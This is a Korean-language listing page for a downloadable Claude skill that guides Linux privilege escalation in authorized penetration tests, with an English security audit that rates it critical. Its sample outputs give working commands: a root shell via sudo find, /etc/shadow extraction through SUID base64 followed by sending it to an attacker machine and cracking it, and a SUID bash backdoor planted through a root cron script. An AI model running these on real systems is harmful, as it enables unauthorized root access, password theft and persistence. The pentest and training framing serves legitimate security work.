linux-privilege-escalation
Linux 권한 상승 평가 실행
보안 전문가는 인증된 침투 테스트 중 Linux 시스템에서 권한 상승 벡터를 식별하기 위한 체계적인 방법이 필요합니다. 이 스킬은 커널 취약점, sudo 오설정, SUID 바이너리, 크론 잡 약점을 다루는 포괄적인 열거 및 악용 워크플로우를 제공합니다.
스킬 ZIP 다운로드
Claude에서 업로드
설정 → 기능 → 스킬 → 스킬 업로드로 이동
토글을 켜고 사용 시작
테스트해 보기
"linux-privilege-escalation" 사용 중입니다. 사용자가 sudo -l 을 실행하고 루트로 /usr/bin/find 를 실행할 수 있음을 발견함
예상 결과:
GTFOBins 악용: 'sudo find . -exec /bin/bash \; -quit' 을 실행하여 루트 쉘을 생성하세요. find 명령의 -exec 플래그는 루트 권한으로 임의의 명령 실행을 허용합니다.
"linux-privilege-escalation" 사용 중입니다. /usr/bin/base64 에서 SUID base64 바이너리 발견됨
예상 결과:
악용: 'base64 /etc/shadow | base64 -d > shadow.txt' 를 사용하여 비밀번호 해시를 추출하세요. shadow.txt 를 공격자 머신으로 전송하고 'john --wordlist=rockyou.txt shadow.txt' 로 크랙하여 평문 비밀번호를 복원하세요.
"linux-privilege-escalation" 사용 중입니다. 루트 크론 잡이 /opt/scripts/backup.sh 에서 쓰기 가능한 스크립트를 실행함
예상 결과:
하이재킹: 스크립트에 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' 를 추가하세요. 크론이 실행한 후 '/tmp/bash -p' 를 실행하여 SUID 백도어를 통해 지속적인 루트 액세스를 확보하세요.
보안 감사
치명적This skill contains complete weaponized exploitation workflows for Linux privilege escalation. While framed as educational content for penetration testing, it provides ready-to-use commands for gaining unauthorized root access, credential theft via /etc/shadow access, SUID backdoor creation, kernel exploitation, and persistent reverse shell payloads. The static scanner correctly identified 44 high-risk patterns including sudo exploitation, SUID manipulation, and shadow file access. False positives include Ruby backtick detection (actually bash commands in markdown). This content should only be distributed in controlled professional security contexts with explicit authorization requirements.
심각한 문제 (4)
높은 위험 문제 (6)
중간 위험 문제 (3)
낮은 위험 문제 (3)
위험 요인
⚡ 스크립트 포함 (1)
⚙️ 외부 명령어 (7)
🌐 네트워크 접근 (4)
감지된 패턴
품질 점수
만들 수 있는 것
인증된 침투 테스트
내부 네트워크 평가를 수행하는 보안 컨설턴트는 이 스킬을 사용하여 권한 상승 경로를 체계적으로 식별하고 초기 액세스의 비즈니스 영향을 입증합니다.
보안 감사 및 규정 준수
시스템 관리자는 공격자가 악용하기 전에 오설정을 식별하고 수정하기 위해 자체 인프라를 감사합니다.
보안 교육 및 훈련
OSCP, GPEN 또는 CRT 와 같은 자격증 공부를 하는 보안 전문가는 이 스킬을 사용하여 실습 환경에서 일반적인 Linux 권한 상승 기법을 이해합니다.
이 프롬프트를 사용해 보세요
Linux 시스템에 대한 낮은 권한의 쉘 액세스가 있습니다. 커널 버전, sudo 권한, SUID 바이너리, 실행 중인 서비스를 포함한 잠재적인 권한 상승 벡터를 식별하기 위해 시스템을 열거하는 것을 도와주세요.
'sudo -l'을 실행할 수 있으며 특정 바이너리에 대한 NOPASSWD 액세스가 있음을 확인했습니다. 출력을 분석하고 허용된 각 명령에 대한 GTFOBins 악용 기법을 제공해주세요.
이 시스템의 모든 SUID 바이너리를 찾고 권한 상승을 위해 악용할 수 있는 바이너리를 식별하세요. 각 취약한 바이너리에 대한 구체적인 악용 명령을 제공해주세요.
커널 버전은 [VERSION] 입니다. 이 커널에 적용 가능한 알려진 익스플로잇을 검색하고 컴파일 및 실행 지침을 제공하세요. 주 익스플로잇이 실패할 경우를 대비한 대체 옵션도 포함하세요.
모범 사례
- 항상 테스트 전에 서면 승인을 얻고 범위 경계를 확인하세요
- 시스템 충돌을 방지하기 위해 프로덕션 사용 전에 실험실 환경에서 커널 익스플로잇을 테스트하세요
- 수정 및 정리를 위해 평가 중 이루어진 모든 변경 사항을 문서화하세요
피하기
- 메커니즘이나 실패 모드를 이해하지 않고 커널 익스플로잇 실행
- 인증된 평가 기간을 초과하여 영구적인 백도어 생성
- 권한 상승을 입증하는 데 필요한 것 이상으로 데이터에 액세스하거나 유출
자주 묻는 질문
이 스킬을 사용해도 합법인가요?
커널 익스플로잇이 모든 Linux 시스템에서 작동하나요?
익스플로잇으로 시스템이 충돌하면 어떻게 해야 하나요?
SUID 바이너리가 악용 가능한지 어떻게 알 수 있나요?
AWS 또는 Azure 와 같은 클라우드 환경에서 이 스킬을 사용할 수 있나요?
이 스킬과 LinPEAS 와 같은 도구의 차이점은 무엇인가요?
개발자 세부 정보
작성자
zebbern라이선스
MIT
리포지토리
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation참조
main
파일 구조
📄 SKILL.md